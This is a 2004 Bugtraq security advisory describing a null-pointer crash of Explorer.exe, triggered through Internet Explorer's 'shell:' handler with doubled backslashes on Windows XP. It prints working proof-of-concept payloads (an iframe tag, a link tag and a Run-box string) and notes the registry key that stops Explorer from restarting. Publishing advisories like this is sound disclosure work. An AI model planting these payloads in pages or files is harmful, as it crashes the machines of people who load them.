Internet Explorer Causing Explorer.exe - Null Pointer Crash

To: "bugtraq" <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Internet Explorer Causing Explorer.exe - Null Pointer Crash
From: "Rafel Ivgi, The-Insider" <theinsider@xxxxxxxxxx>
Date: Fri, 19 Mar 2004 19:30:16 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: "Rafel Ivgi, The-Insider" <theinsider@xxxxxxxxxx>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:     Internet Explorer & Explorer.exe
Vendors:           http://www.microsoft.com
Versions:          Windows Xp Professional & Internet Explorer
6.0.2600.0000.xpclnt_qfe.021108-2107
Patched With:  Q330994; Q822925; Q828750; Q824145;
Platforms:         WindowsXp
Bug:                   Internet Explorer Causing Explorer.exe - Null Pointer
Crash
Risk:                  Medium -  D.O.S
Exploitation:     Remote with browser
Date:                  19 Mar 2004
Author:             Rafel Ivgi, The-Insider
e-mail:                the_insider@xxxxxxxx
web:                   http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

WindowsXp is currently the most common operating system in the world.
This product must be as safe as it is common.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Lately a new function was discovered : "shell:". This function allows
running some
new functions remotley. There is a bug in Explorer.exe when accessing a
filename
with double backslash.

For Example accessing any of the html tags below, will cause explorer to
crash.
<iframe src=shell:windows\\system32\\calc.exe></iframe>
Or
<a href=shell:windows\\system32\\calc.exe></a>
Or
Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

Explorer.exe crashes when using "\\".
"\" doesn't crash it and even %5C%5C doesn't crash it.

There is a registery key which is turned on by default. This key
automatically restarts
"Explorer.exe". If this key is set to "0", Explorer.exe will not restart.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoRestartShell"=dword:00000001

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

<iframe src=shell:windows\\system32\\calc.exe></iframe>
Or
<a href=shell:windows\\system32\\calc.exe></a>
Or
Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

Prev by Date: Re: mac osx- admin service buffer overflow
Next by Date: Re[2]: ws_ftp overflow (WS_FTP Pro 8.0.3 is vulnerable)
Previous by thread: Re: Winamp 5.02 Long Filename Buffer Overflow Vulnerability
Next by thread: Samba 'smbprint' script tmpfile vulnerability.
Index(es):
- Date
- Thread